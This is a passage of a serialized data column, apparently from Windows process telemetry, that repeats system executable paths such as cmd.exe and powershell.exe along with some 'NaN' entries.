md.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cm